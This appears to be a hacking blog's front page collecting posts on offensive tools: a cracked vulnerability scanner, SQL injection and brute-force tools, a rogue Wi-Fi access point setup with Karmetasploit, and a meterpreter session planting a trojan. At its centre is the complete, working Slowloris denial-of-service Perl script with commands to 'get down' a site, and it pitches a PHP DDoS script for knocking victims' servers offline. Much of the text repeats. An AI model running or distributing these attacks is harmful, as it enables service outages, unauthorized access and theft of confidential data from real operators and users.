ACUNETIX WEB VULNERABILITY SCANNER V8
2:39 am
ACUNETIX WEB VULNERABILITY SCANNER 8 BETA
Acunetix Web Vulnerability Scanner 8 BETA Released for download
Download here
VOIP HOPPER 2.01
VOIP HOPPER 2.01 RELEASED – IP PHONE VLAN HOPPING TOOL
VoIP Hopper is a GPLv3 licensed security tool, written in C, that rapidly runs a VLAN Hop into the Voice VLAN on specific ethernet switches. VoIP Hopper does this by mimicking the behavior of an IP Phone, in Cisco, Avaya, and Nortel environments.
This requires two important steps in order for the tool to traverse VLANs for unauthorized access. First, discovery of the correct 12 bit Voice VLAN ID (VVID) used by the IP Phones is required. VoIP Hopper supports multiple protocol discovery methods (CDP, DHCP, LLDP-MED, 802.1q ARP) for this important first step. Second, the tool creates a virtual VoIP ethernet interface on the OS. It then inserts a spoofed 4-byte 802.1q vlan header containing the 12 bit VVID into a spoofed DHCP request.
New Features
* New “Assessment” mode: Interactive, menu driven command interface, improves ability to VLAN Hop in Pentesting when the security tester is working against an unknown network infrastructure.
* New VLAN Discovery methods (802.1q ARP, LLDP-MED).
* LLDP-MED spoofing and sniffing support.
* Can bypass VoIP VLAN subnet that have DHCP disabled, and spoof the IP address and MAC address of a phone by setting a static IP.
This requires two important steps in order for the tool to traverse VLANs for unauthorized access. First, discovery of the correct 12 bit Voice VLAN ID (VVID) used by the IP Phones is required. VoIP Hopper supports multiple protocol discovery methods (CDP, DHCP, LLDP-MED, 802.1q ARP) for this important first step. Second, the tool creates a virtual VoIP ethernet interface on the OS. It then inserts a spoofed 4-byte 802.1q vlan header containing the 12 bit VVID into a spoofed DHCP request.
New Features
* New “Assessment” mode: Interactive, menu driven command interface, improves ability to VLAN Hop in Pentesting when the security tester is working against an unknown network infrastructure.
* New VLAN Discovery methods (802.1q ARP, LLDP-MED).
* LLDP-MED spoofing and sniffing support.
* Can bypass VoIP VLAN subnet that have DHCP disabled, and spoof the IP address and MAC address of a phone by setting a static IP.
THE MOLE – SQL INJECTION SQLI EXPLOITATION TOOL
THE MOLE – AUTOMATIC SQL INJECTION SQLI EXPLOITATION TOOL
The Mole – Automatic SQL Injection SQLi Exploitation Tool
Features
- Support for injections using Mysql, SQL Server, Postgres and Oracle databases.
- Command line interface. Different commands trigger different actions.
- Developed in python 3.
- Support for query filters, in order to bypass certain IPS/IDS rules using generic filters, and the possibility of creating new ones easily.
- Auto-completion for commands, command arguments and database, table and columns names.
You can download it from here
PATATOR – BRUTE FORCING TOOL
PATATOR – MULTI PURPOSE BRUTE FORCING TOOL
Patator is a multi-purpose brute-forcer, with a modular design and a flexible usage. Basically the author got tired of using Medusa, Hydra, ncrack, metasploit auxiliary modules, nmap NSE scripts and the like because:
They either do not work or are not reliable (false negatives several times in the past)
They are slow (not multi-threaded or not testing multiple passwords within the same TCP connection)
They lack very useful features that are easy to code in python (eg. interactive runtime)
Basically you should give Patator a try once you get disappointed by Medusa, Hydra or other brute-force tools and are about to code your own small script because Patator will allow you to:
Not write the same code over and over
Run multi-threaded
Benefit for useful features such as the interactive runtime commands, response logging, etc.
They either do not work or are not reliable (false negatives several times in the past)
They are slow (not multi-threaded or not testing multiple passwords within the same TCP connection)
They lack very useful features that are easy to code in python (eg. interactive runtime)
Basically you should give Patator a try once you get disappointed by Medusa, Hydra or other brute-force tools and are about to code your own small script because Patator will allow you to:
Not write the same code over and over
Run multi-threaded
Benefit for useful features such as the interactive runtime commands, response logging, etc.
ftp_login : Brute-force FTP
ssh_login : Brute-force SSH
telnet_login : Brute-force Telnet
smtp_login : Brute-force SMTP
smtp_vrfy : Enumerate valid users using the SMTP VRFY command
smtp_rcpt : Enumerate valid users using the SMTP RCPT TO command
http_fuzz : Brute-force HTTP/HTTPS
pop_passd : Brute-force poppassd (not POP3)
ldap_login : Brute-force LDAP
smb_login : Brute-force SMB
mssql_login : Brute-force MSSQL
oracle_login : Brute-force Oracle
mysql_login : Brute-force MySQL
pgsql_login : Brute-force PostgreSQL
vnc_login : Brute-force VNC
dns_forward : Forward lookup subdomains
dns_reverse : Reverse lookup subnets
snmp_login : Brute-force SNMPv1/2 and SNMPv3
unzip_pass : Brute-force the password of encrypted ZIP files
keystore_pass : Brute-force the password of Java keystore files
You can download Patator v0.3 here:
Acunetix Vulnerability Scanner v8 Patch
Acunetix Vulnerability Scanner v8 Patch By Ghost
Enjoy it with the amazing toool,,,,
Download here
Click Here to Download Acunetix Vulnerability Scanner v8 Beta
DOS ATTACK WITH SLOWLORIS
DDOS ATTACK WITH SLOWLORIS IN BACKTRACK 5 R3
DDOS ATTACK WITH BACKTRACK R3 using SLOWLORIS
(EDUCATIONAL PURPOSE ONLY)
Commands
Download Script
cd Directory
chmod +x slowloris.pl
perl ./slowloris -dns www.site.com -port 80 -timeout 1 -num 1000 -cache
chmod +x slowloris.pl
perl ./slowloris -dns www.site.com -port 80 -timeout 1 -num 1000 -cache
Wait....
Goto Browser then Type Your site (Get Down..!)
SCRIPT OF Slowloris.pl
#!/usr/bin/perl -w use strict; use IO::Socket::INET; use IO::Socket::SSL; use Getopt::Long; use Config; $SIG{'PIPE'} = 'IGNORE'; #Ignore broken pipe errors print <<EOTEXT; CCCCCCCCCCOOCCOOOOO888\@8\@8888OOOOCCOOO888888888\@\@\@\@\@\@\@\@\@8\@8\@\@\@\@888OOCooocccc:::: CCCCCCCCCCCCCCCOO888\@888888OOOCCCOOOO888888888888\@88888\@\@\@\@\@\@\@888\@8OOCCoococc::: CCCCCCCCCCCCCCOO88\@\@888888OOOOOOOOOO8888888O88888888O8O8OOO8888\@88\@\@8OOCOOOCoc:: CCCCooooooCCCO88\@\@8\@88\@888OOOOOOO88888888888OOOOOOOOOOCCCCCOOOO888\@8888OOOCc:::: CooCoCoooCCCO8\@88\@8888888OOO888888888888888888OOOOCCCooooooooCCOOO8888888Cocooc: ooooooCoCCC88\@88888\@888OO8888888888888888O8O8888OOCCCooooccccccCOOOO88\@888OCoccc ooooCCOO8O888888888\@88O8OO88888OO888O8888OOOO88888OCocoococ::ccooCOO8O888888Cooo oCCCCCCO8OOOCCCOO88\@88OOOOOO8888O888OOOOOCOO88888O8OOOCooCocc:::coCOOO888888OOCC oCCCCCOOO88OCooCO88\@8OOOOOO88O888888OOCCCCoCOOO8888OOOOOOOCoc::::coCOOOO888O88OC oCCCCOO88OOCCCCOO8\@\@8OOCOOOOO8888888OoocccccoCO8O8OO88OOOOOCc.:ccooCCOOOO88888OO CCCOOOO88OOCCOOO8\@888OOCCoooCOO8888Ooc::...::coOO88888O888OOo:cocooCCCCOOOOOO88O CCCOO88888OOCOO8\@\@888OCcc:::cCOO888Oc..... ....cCOOOOOOOOOOOc.:cooooCCCOOOOOOOOO OOOOOO88888OOOO8\@8\@8Ooc:.:...cOO8O88c. . .coOOO888OOOOCoooooccoCOOOOOCOOOO OOOOO888\@8\@88888888Oo:. . ...cO888Oc.. :oOOOOOOOOOCCoocooCoCoCOOOOOOOO COOO888\@88888888888Oo:. .O8888C: .oCOo. ...cCCCOOOoooooocccooooooooCCCOO CCCCOO888888O888888Oo. .o8Oo. .cO88Oo: :. .:..ccoCCCooCooccooccccoooooCCCC coooCCO8\@88OO8O888Oo:::... .. :cO8Oc. . ..... :. .:ccCoooooccoooocccccooooCCC :ccooooCO888OOOO8OOc..:...::. .co8\@8Coc::.. .... ..:cooCooooccccc::::ccooCCooC .:::coocccoO8OOOOOOC:..::....coCO8\@8OOCCOc:... ....:ccoooocccc:::::::::cooooooC ....::::ccccoCCOOOOOCc......:oCO8\@8\@88OCCCoccccc::c::.:oCcc:::cccc:..::::coooooo .......::::::::cCCCCCCoocc:cO888\@8888OOOOCOOOCoocc::.:cocc::cc:::...:::coocccccc ...........:::..:coCCCCCCCO88OOOO8OOOCCooCCCooccc::::ccc::::::.......:ccocccc:co .............::....:oCCoooooCOOCCOCCCoccococc:::::coc::::....... ...:::cccc:cooo ..... ............. .coocoooCCoco:::ccccccc:::ccc::.......... ....:::cc::::coC . . ... .... .. .:cccoCooc:.. ::cccc:::c:.. ......... ......::::c:cccco . .. ... .. .. .. ..:...:cooc::cccccc:..... ......... .....:::::ccoocc . . .. ..::cccc:.::ccoocc:. ........... .. . ..:::.:::::::ccco Welcome to Slowloris - the low bandwidth, yet greedy and poisonous HTTP client EOTEXT my ( $host, $port, $sendhost, $shost, $test, $version, $timeout, $connections ); my ( $cache, $httpready, $method, $ssl, $rand, $tcpto ); my $result = GetOptions( 'shost=s' => \$shost, 'dns=s' => \$host, 'httpready' => \$httpready, 'num=i' => \$connections, 'cache' => \$cache, 'port=i' => \$port, 'https' => \$ssl, 'tcpto=i' => \$tcpto, 'test' => \$test, 'timeout=i' => \$timeout, 'version' => \$version, ); if ($version) { print "Version 0.7\n"; exit; } unless ($host) { print "Usage:\n\n\tperl $0 -dns [www.example.com] -options\n"; print "\n\tType 'perldoc $0' for help with options.\n\n"; exit; } unless ($port) { $port = 80; print "Defaulting to port 80.\n"; } unless ($tcpto) { $tcpto = 5; print "Defaulting to a 5 second tcp connection timeout.\n"; } unless ($test) { unless ($timeout) { $timeout = 100; print "Defaulting to a 100 second re-try timeout.\n"; } unless ($connections) { $connections = 1000; print "Defaulting to 1000 connections.\n"; } } my $usemultithreading = 0; if ( $Config{usethreads} ) { print "Multithreading enabled.\n"; $usemultithreading = 1; use threads; use threads::shared; } else { print "No multithreading capabilites found!\n"; print "Slowloris will be slower than normal as a result.\n"; } my $packetcount : shared = 0; my $failed : shared = 0; my $connectioncount : shared = 0; srand() if ($cache); if ($shost) { $sendhost = $shost; } else { $sendhost = $host; } if ($httpready) { $method = "POST"; } else { $method = "GET"; } if ($test) { my @times = ( "2", "30", "90", "240", "500" ); my $totaltime = 0; foreach (@times) { $totaltime = $totaltime + $_; } $totaltime = $totaltime / 60; print "This test could take up to $totaltime minutes.\n"; my $delay = 0; my $working = 0; my $sock; if ($ssl) { if ( $sock = new IO::Socket::SSL( PeerAddr => "$host", PeerPort => "$port", Timeout => "$tcpto", Proto => "tcp", ) ) { $working = 1; } } else { if ( $sock = new IO::Socket::INET( PeerAddr => "$host", PeerPort => "$port", Timeout => "$tcpto", Proto => "tcp", ) ) { $working = 1; } } if ($working) { if ($cache) { $rand = "?" . int( rand(99999999999999) ); } else { $rand = ""; } my $primarypayload = "GET /$rand HTTP/1.1\r\n" . "Host: $sendhost\r\n" . "User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322; .NET CLR 2.0.503l3; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; MSOffice 12)\r\n" . "Content-Length: 42\r\n"; if ( print $sock $primarypayload ) { print "Connection successful, now comes the waiting game...\n"; } else { print "That's odd - I connected but couldn't send the data to $host:$port.\n"; print "Is something wrong?\nDying.\n"; exit; } } else { print "Uhm... I can't connect to $host:$port.\n"; print "Is something wrong?\nDying.\n"; exit; } for ( my $i = 0 ; $i <= $#times ; $i++ ) { print "Trying a $times[$i] second delay: \n"; sleep( $times[$i] ); if ( print $sock "X-a: b\r\n" ) { print "\tWorked.\n"; $delay = $times[$i]; } else { if ( $SIG{__WARN__} ) { $delay = $times[ $i - 1 ]; last; } print "\tFailed after $times[$i] seconds.\n"; } } if ( print $sock "Connection: Close\r\n\r\n" ) { print "Okay that's enough time. Slowloris closed the socket.\n"; print "Use $delay seconds for -timeout.\n"; exit; } else { print "Remote server closed socket.\n"; print "Use $delay seconds for -timeout.\n"; exit; } if ( $delay < 166 ) { print <<EOSUCKS2BU; Since the timeout ended up being so small ($delay seconds) and it generally takes between 200-500 threads for most servers and assuming any latency at all... you might have trouble using Slowloris against this target. You can tweak the -timeout flag down to less than 10 seconds but it still may not build the sockets in time. EOSUCKS2BU } } else { print "Connecting to $host:$port every $timeout seconds with $connections sockets:\n"; if ($usemultithreading) { domultithreading($connections); } else { doconnections( $connections, $usemultithreading ); } } sub doconnections { my ( $num, $usemultithreading ) = @_; my ( @first, @sock, @working ); my $failedconnections = 0; $working[$_] = 0 foreach ( 1 .. $num ); #initializing $first[$_] = 0 foreach ( 1 .. $num ); #initializing while (1) { $failedconnections = 0; print "\t\tBuilding sockets.\n"; foreach my $z ( 1 .. $num ) { if ( $working[$z] == 0 ) { if ($ssl) { if ( $sock[$z] = new IO::Socket::SSL( PeerAddr => "$host", PeerPort => "$port", Timeout => "$tcpto", Proto => "tcp", ) ) { $working[$z] = 1; } else { $working[$z] = 0; } } else { if ( $sock[$z] = new IO::Socket::INET( PeerAddr => "$host", PeerPort => "$port", Timeout => "$tcpto", Proto => "tcp", ) ) { $working[$z] = 1; $packetcount = $packetcount + 3; #SYN, SYN+ACK, ACK } else { $working[$z] = 0; } } if ( $working[$z] == 1 ) { if ($cache) { $rand = "?" . int( rand(99999999999999) ); } else { $rand = ""; } my $primarypayload = "$method /$rand HTTP/1.1\r\n" . "Host: $sendhost\r\n" . "User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322; .NET CLR 2.0.503l3; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; MSOffice 12)\r\n" . "Content-Length: 42\r\n"; my $handle = $sock[$z]; if ($handle) { print $handle "$primarypayload"; if ( $SIG{__WARN__} ) { $working[$z] = 0; close $handle; $failed++; $failedconnections++; } else { $packetcount++; $working[$z] = 1; } } else { $working[$z] = 0; $failed++; $failedconnections++; } } else { $working[$z] = 0; $failed++; $failedconnections++; } } } print "\t\tSending data.\n"; foreach my $z ( 1 .. $num ) { if ( $working[$z] == 1 ) { if ( $sock[$z] ) { my $handle = $sock[$z]; if ( print $handle "X-a: b\r\n" ) { $working[$z] = 1; $packetcount++; } else { $working[$z] = 0; #debugging info $failed++; $failedconnections++; } } else { $working[$z] = 0; #debugging info $failed++; $failedconnections++; } } } print "Current stats:\tSlowloris has now sent $packetcount packets successfully.\nThis thread now sleeping for $timeout seconds...\n\n"; sleep($timeout); } } sub domultithreading { my ($num) = @_; my @thrs; my $i = 0; my $connectionsperthread = 50; while ( $i < $num ) { $thrs[$i] = threads->create( \&doconnections, $connectionsperthread, 1 ); $i += $connectionsperthread; } my @threadslist = threads->list(); while ( $#threadslist > 0 ) { $failed = 0; } } __END__
TITLE
Slowloris
VERSION
Version 0.7 Beta
DATE
06/17/2009
AUTHOR
RSnake <h@ckers.org> with threading from John Kinsella
ABSTRACT
Slowloris both helps identify the timeout windows of a HTTP server or Proxy server, can bypass httpready protection and ultimately performs a fairly low bandwidth denial of service. It has the added benefit of allowing the server to come back at any time (once the program is killed), and not spamming the logs excessively. It also keeps the load nice and low on the target server, so other vital processes don't die unexpectedly, or cause alarm to anyone who is logged into the server for other reasons.
AFFECTS
Apache 1.x, Apache 2.x, dhttpd, GoAhead WebServer, others...?
NOT AFFECTED
IIS6.0, IIS7.0, lighttpd, nginx, Cherokee, Squid, others...?
DESCRIPTION
Slowloris is designed so that a single machine (probably a Linux/UNIX machine since Windows appears to limit how many sockets you can have open at any given time) can easily tie up a typical web server or proxy server by locking up all of it's threads as they patiently wait for more data. Some servers may have a smaller tolerance for timeouts than others, but Slowloris can compensate for that by customizing the timeouts. There is an added function to help you get started with finding the right sized timeouts as well.
As a side note, Slowloris does not consume a lot of resources so modern operating systems don't have a need to start shutting down sockets when they come under attack, which actually in turn makes Slowloris better than a typical flooder in certain circumstances. Think of Slowloris as the HTTP equivalent of a SYN flood.
Testing
If the timeouts are completely unknown, Slowloris comes with a mode to help you get started in your testing:
Testing Example:
./slowloris.pl -dns www.example.com -port 80 -test
This won't give you a perfect number, but it should give you a pretty good guess as to where to shoot for. If you really must know the exact number, you may want to mess with the @times array (although I wouldn't suggest that unless you know what you're doing).
HTTP DoS
Once you find a timeout window, you can tune Slowloris to use certain timeout windows. For instance, if you know that the server has a timeout of 3000 seconds, but the the connection is fairly latent you may want to make the timeout window 2000 seconds and increase the TCP timeout to 5 seconds. The following example uses 500 sockets. Most average Apache servers, for instance, tend to fall down between 400-600 sockets with a default configuration. Some are less than 300. The smaller the timeout the faster you will consume all the available resources as other sockets that are in use become available - this would be solved by threading, but that's for a future revision. The closer you can get to the exact number of sockets, the better, because that will reduce the amount of tries (and associated bandwidth) that Slowloris will make to be successful. Slowloris has no way to identify if it's successful or not though.
HTTP DoS Example:
./slowloris.pl -dns www.example.com -port 80 -timeout 2000 -num 500 -tcpto 5
HTTPReady Bypass
HTTPReady only follows certain rules so with a switch Slowloris can bypass HTTPReady by sending the attack as a POST verses a GET or HEAD request with the -httpready switch.
HTTPReady Bypass Example
./slowloris.pl -dns www.example.com -port 80 -timeout 2000 -num 500 -tcpto 5 -httpready
Stealth Host DoS
If you know the server has multiple webservers running on it in virtual hosts, you can send the attack to a seperate virtual host using the -shost variable. This way the logs that are created will go to a different virtual host log file, but only if they are kept separately.
Stealth Host DoS Example:
./slowloris.pl -dns www.example.com -port 80 -timeout 30 -num 500 -tcpto 1 -shost www.virtualhost.com
HTTPS DoS
Slowloris does support SSL/TLS on an experimental basis with the -https switch. The usefulness of this particular option has not been thoroughly tested, and in fact has not proved to be particularly effective in the very few tests I performed during the early phases of development. Your mileage may vary.
HTTPS DoS Example:
./slowloris.pl -dns www.example.com -port 443 -timeout 30 -num 500 -https
HTTP Cache
Slowloris does support cache avoidance on an experimental basis with the -cache switch. Some caching servers may look at the request path part of the header, but by sending different requests each time you can abuse more resources. The usefulness of this particular option has not been thoroughly tested. Your mileage may vary.
HTTP Cache Example:
./slowloris.pl -dns www.example.com -port 80 -timeout 30 -num 500 -cache
Issues Slowloris is known to not work on several servers found in the NOT AFFECTED section above and through Netscalar devices, in it's current incarnation. They may be ways around this, but not in this version at this time. Most likely most anti-DDoS and load balancers won't be thwarted by Slowloris, unless Slowloris is extremely distrubted, although only Netscalar has been tested. Slowloris isn't completely quiet either, because it can't be. Firstly, it does send out quite a few packets (although far far less than a typical GET request flooder). So it's not invisible if the traffic to the site is typically fairly low. On higher traffic sites it will unlikely that it is noticed in the log files - although you may have trouble taking down a larger site with just one machine, depending on their architecture. For some reason Slowloris works way better if run from a *Nix box than from Windows. I would guess that it's probably to do with the fact that Windows limits the amount of open sockets you can have at once to a fairly small number. If you find that you can't open any more ports than ~130 or so on any server you test - you're probably running into this "feature" of modern operating systems. Either way, this program seems to work best if run from FreeBSD. Once you stop the DoS all the sockets will naturally close with a flurry of RST and FIN packets, at which time the web server or proxy server will write to it's logs with a lot of 400 (Bad Request) errors. So while the sockets remain open, you won't be in the logs, but once the sockets close you'll have quite a few entries all lined up next to one another. You will probably be easy to find if anyone is looking at their logs at that point - although the DoS will be over by that point too.
PHP DOS/DDOS ATTACK SCRIPT
PHP DOS/DDOS (DENIAL OF SERVICE) ATTACK SCRIPT
You Can Make a DoS attack from your server (using that nice high bandwidth connection provided by your hosting provider) to bring your victims server/PC to its knees.
This script should be used responsibly, I did not create it, im merely distributing it for “educational” purposes. All The Best !
Functions
ddos script
php dos
php ddos script
php dos script
ddos php script
ddos script php
phpDos
ddos scripts
script DDOS
php ddos
ddos php
denial of service script
dos php
ddos attack script
php ddoser
script php ddos
dos php script
php script ddos
ddos script download
php DDos attack script
script ddos php
PHP DoS Script by Exe
ddos
php dos by exe
ddos skript
mysql ddos
DENIAL OF SERVICE php script
php ddos attack
php ddos download
download script ddos
ddos online
denial of service scripts
PHP DoS/DDoS (Denial Of Service) Script
ddos php tool
php curl ddos
ddos php scripts
script ddos attack
dos script denial
php Dos scripts
php denial of service
This script should be used responsibly, I did not create it, im merely distributing it for “educational” purposes. All The Best !
Functions
ddos script
php dos
php ddos script
php dos script
ddos php script
ddos script php
phpDos
ddos scripts
script DDOS
php ddos
ddos php
denial of service script
dos php
ddos attack script
php ddoser
script php ddos
dos php script
php script ddos
ddos script download
php DDos attack script
script ddos php
PHP DoS Script by Exe
ddos
php dos by exe
ddos skript
mysql ddos
DENIAL OF SERVICE php script
php ddos attack
php ddos download
download script ddos
ddos online
denial of service scripts
PHP DoS/DDoS (Denial Of Service) Script
ddos php tool
php curl ddos
ddos php scripts
script ddos attack
dos script denial
php Dos scripts
php denial of service
Download here
HIDE FILES AND FOLDERS IN LINUX
HIDE YOUR PERSONAL FILES AND FOLDERS IN LINUX
Steps to Hide a File or Folder :
1. Open the drive containing the folder.
2. Select the folder to rename it. or by simply pressing F2 after selecting the folder.
3. Rename the folder by putting a “.” (dot) in front of current name. Press ENTER.
4. The folder is now ready to be hidden.
1. Navigate to the location of the hidden folder.
2. In the menu bar, click the “View” tab and select to check the box next to “Show Hidden Files”. This can also be done by simply pressing “Ctrl + H”.
Your hidden folder appears to you, enabling you to access it right away. This of-course doesn’t change the hidden property of the folder. Re-hiding the folder involves just clicking on the “View” tab once more and un-checking the box next to “Show Hidden Files” or pressing “Ctrl + H” once again.
1. Follow the steps to view the hidden folder as mentioned above.
2. After the folder can be viewed, select to rename it once again.
3. Just remove the “.” (dot) you had placed at the beginning of the name of the folder and press ENTER.
The folder has been un-hidden.
Hiding a file or a folder is a basic example of the highest level of security that Linux provides its users with. This, and a lot more makes Linux the “numero uno” operating system for a secure workstation.
1. Open the drive containing the folder.
2. Select the folder to rename it. or by simply pressing F2 after selecting the folder.
3. Rename the folder by putting a “.” (dot) in front of current name. Press ENTER.
4. The folder is now ready to be hidden.
Viewing the Hidden File or Folder :
Proceed in the following steps to view the folder you have hidden :1. Navigate to the location of the hidden folder.
2. In the menu bar, click the “View” tab and select to check the box next to “Show Hidden Files”. This can also be done by simply pressing “Ctrl + H”.
Your hidden folder appears to you, enabling you to access it right away. This of-course doesn’t change the hidden property of the folder. Re-hiding the folder involves just clicking on the “View” tab once more and un-checking the box next to “Show Hidden Files” or pressing “Ctrl + H” once again.
Un-hiding the File or Folder :
Un-hiding a hidden file or folder in Linux is a much simpler task. The process is described below :1. Follow the steps to view the hidden folder as mentioned above.
2. After the folder can be viewed, select to rename it once again.
3. Just remove the “.” (dot) you had placed at the beginning of the name of the folder and press ENTER.
The folder has been un-hidden.
Hiding a file or a folder is a basic example of the highest level of security that Linux provides its users with. This, and a lot more makes Linux the “numero uno” operating system for a secure workstation.
ROOT A SERVER ~ E-BOOK
HOW TO R00T ON SERVER : E-BOOK
Hello CHC(Chennai Hackers Connect) friends here i am sharing one ebook on how to root a server.
Password:computermaniac
Download here
KARMETASPLOIT- TUTORIAL
KARMETASPLOIT- BACKTRACK 5 TUTORIAL
So what is Karmetasploit?
KARMA is a wireless client attack toolkit and the integration of Karma and metasploit is called Karmetasploit, in 2004 Dino A. Dai Zovi and Shane A. Macaulay did a presentation called "All your layer are belong to us" in that presentation they have described the insecurity of wireless access point and introduced the tool KARMA. This tool acts as wireless access point and responds to all probe requests from wireless clients. Once a client has associated with the KARMA access point, every service they try to access leads to a malicious application.
The above passage gives the basic introduction of KARMA and about Metasploit your can learn from here.
Karmetasploit Tutorial Configuration
If you
are not using backtrack 5 than you must have to install some dependencies like Aircrack-ng
$ svn co
http://trac.aircrack-ng.org/svn/trunk/ aircrack-ng
$ make
# make install
$ make
# make install
#
airmon-ng start [wifi-interface]
For
backtrack like backtrack5 follow the procedure
root@bt:/pentest/exploits/framework3#
wget
Now
here is the need to configure DHCP server so that the Fake AP connect with the
network.
root@bt:/pentest/exploits/framework3#
cat /etc/dhcp3/dhcpd.conf
option domain-name-servers 10.0.0.1;
default-lease-time 60;
max-lease-time 72;
ddns-update-style none;
authoritative;
log-facility local7;
subnet 10.0.0.0 netmask 255.255.255.0 {
range 10.0.0.100 10.0.0.254;
option routers 10.0.0.1;
option domain-name-servers 10.0.0.1;
}
option domain-name-servers 10.0.0.1;
default-lease-time 60;
max-lease-time 72;
ddns-update-style none;
authoritative;
log-facility local7;
subnet 10.0.0.0 netmask 255.255.255.0 {
range 10.0.0.100 10.0.0.254;
option routers 10.0.0.1;
option domain-name-servers 10.0.0.1;
}
root@bt:~#
gem install activerecord sqlite3-ruby
By we
approx done now the time to restart the wireless interface and start listening.
root@bt:~#
airmon-ng
root@bt:~# airmon-ng stop ath0
root@bt:~# airmon-ng start wifi0
root@bt:~# airbase-ng -P -C 30 -e "U R PWND" -v ath1
root@bt:~# airmon-ng stop ath0
root@bt:~# airmon-ng start wifi0
root@bt:~# airbase-ng -P -C 30 -e "U R PWND" -v ath1
What
this commands do? These command is used to create a new interface that is rogue
interface or fake AP, now we have to assign IP address and DHCP configuration
so the interface work properly.
root@bt:~#
ifconfig at0 up 10.0.0.1 netmask 255.255.255.0root@bt:~# dhcpd3 -cf
/etc/dhcp3/dhcpd.conf at0root@bt:~# ps aux | grep dhcpd
Karmetasploit Attack Vector
After
configuration you are ready to run karmetasploit and start an attack
root@bt:~#
cd /pentest/exploits/framework3/
root@bt:/pentest/exploits/framework3# msfconsole -r karma.rc
The
command will start metasploit and than Karma script start to act as a fake AP
and it will give you the command like this
msf
auxiliary(http) >
When
the victim will start using this AP you are free to monitor all the activities
and you can record of the confidential information.
msf
auxiliary(http) >
[*] DNS 10.0.0.100:1276 XID 87 (IN::A www.google.com)
Access Metasploit through PuTTY
Access Metasploit through PuTTY
While using the a number of virtual machines simultaneously, there is memory shortage in Windows machine, therefore we have to adopt some technique to avoid this situation.
Solution to this problem is to use PuTTY as it is one of the most popular and free SSH client for Windows.We can easily connect the session with the Back|Track machine using PuTTY.
STEPS:
1- We will start our BackTrack virtual machine.Login to the command line and execute any
one of the following commands to start secure shell.
root@bt:~# /etc/init.d/start ssh
root@bt:~# start ssh
This starts the SSH process on the BackTrack machine. Find the IP address of the machine by entering the following command:
root@bt:~# ifconfig
Note down this IP address on your notepad :-)
2- Now start PuTTY on the host operating system. Enter the IP address(Host Name) of the Back|Track virtual machine and enter port 22.
Now click on Open to launch the command line. If the connection is successful, you will see the PuTTY command line functioning on behalf of the BackTrack machine. It will ask you to log in. Enter the credentials and enter ifconfig to check if the IP is the same as that of the virtual BackTrack.
BENEFITS:
In SSH session we can interact with the BackTrack virtual machine using PuTTY. As the GUI of Back|Track is not loaded, it reduces the memory consumption by almost half. Also minimizing the BackTrack virtual machine will further reduce memory consumption as the Windows operating system provides less memory share to the processes that are minimized and provides faster execution of tasks.
BLUETOOTH HACKING - BACKTRACK
BLUETOOTH ANALYSIS IN BACKTRACK
Bluediving
[MAIN MENU] menu: [a] Action [e] Exploit [i] Info [t] Tools
[1] Scan
[2] Scan and attack
[3] Scan and info
[4] Scan for...
[5] Add known device
[6] Change preferences
[7] Show preferences
[8] Show logfile
-=-=-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= [x] Exit -
btscanner
Example Usage: btscanner
Enter ‘i’ to begin a scan for devices, and then ‘a’ to abort the scan once devices are found. Select the discovered device by pressing “Enter” to see more information about the target.
SET VIDEO TUTORIAL
SOCIAL ENGINEERING TOOLKIT TUTORIAL-BACKTRACK 5
Social engineering also known as human hack, social engineering is an act to manipulate human mind to get the desire goals. Social engineering is a general term and on daily life everyone implement it but usage of social engineering in hacking and penetration testing is little different. The main use of social engineering in hacking is to get the information, maintaining access and so on.
There are various social engineering tips and tricks available on the Internet beside these tips there is a social engineering toolkit available for implement computer based social engineering attack.
What Is Social Engineering Toolkit
In this article I will discuss about the usage of social engineering toolkit on backtrack 5 to hack a windows operating system, but before going to the actual tutorial I want to share the basic introduction of social engineering toolkit that would really help for the beginner.
The Social-Engineering Toolkit (SET) is a python-driven suite of custom tools which solely focuses on attacking the human element of penetration testing. It’s main purpose is to augment and simulate social-engineering attacks and allow the tester to effectively test how a targeted attack may succeed.
Social-Engineering toolkit available on backtrack like on backtrack 5, backbox, blackbuntu,Gnacktrack and other Linux distribution that are used for penetration testing.
If you are using some other Linux distribution than use the command to get SET.
svn co http://svn.secmaniac.com/social_engineering_toolkit set/
Social Engineering Toolkit Tutorial
Well for this tutorial I am using backtrack 5 and the tutorial will teach you a single method to own a computer by using SET toolkit while more SET tutorial will be post on later articles. For the best result I have made video tutorial so,
As I have said on the video that more command on the article so here is the necessary commands.
ps
The 'ps' command displays a list of running processes on the target.
The 'ps' command displays a list of running processes on the target.
meterpreter > ps
Download
meterpreter > download
c:\\boot.ini
Upload
meterpreter > upload
evil_trojan.exe c:\\windows\\system32
Execute
meterpreter > execute -f
cmd.exe -i -H
shell
If you want to get the DOS
screen of victim PC for downloading and upload your backdoor and other jobs use
shell.
meterpreter > shell
Process 39640 created.
Channel 2 created.
Microsoft Windows XP [Version
5.1.2600]
(C) Copyright 1985-2001
Microsoft Corp.
C:\WINDOWS\system32>
Subscribe to:
Posts (Atom)
Popular Posts
-
Undo Sent Emails in Gmail
-
Banner Grabbing - Backtrack
-
CyberGate RAT COMPLETE TUTORIAL
-
Android SESSION HIJACKING TOOL 'DROIDSHEEP'
-
Tutorial to Install TOR ON WINDOWS 7
-
Top FAMOUS HACKERS
-
RAM FORENSICS TOOLS - BACKTRACK
-
OPEN 2 OR MORE GMAIL ACCOUNT'S IN SAME BROWSER
-
The Best of Wifi Hack Tools and E-Books
-
Reset Windows Password (Including Vista) + Boot Disk
Footprinting
0 comments: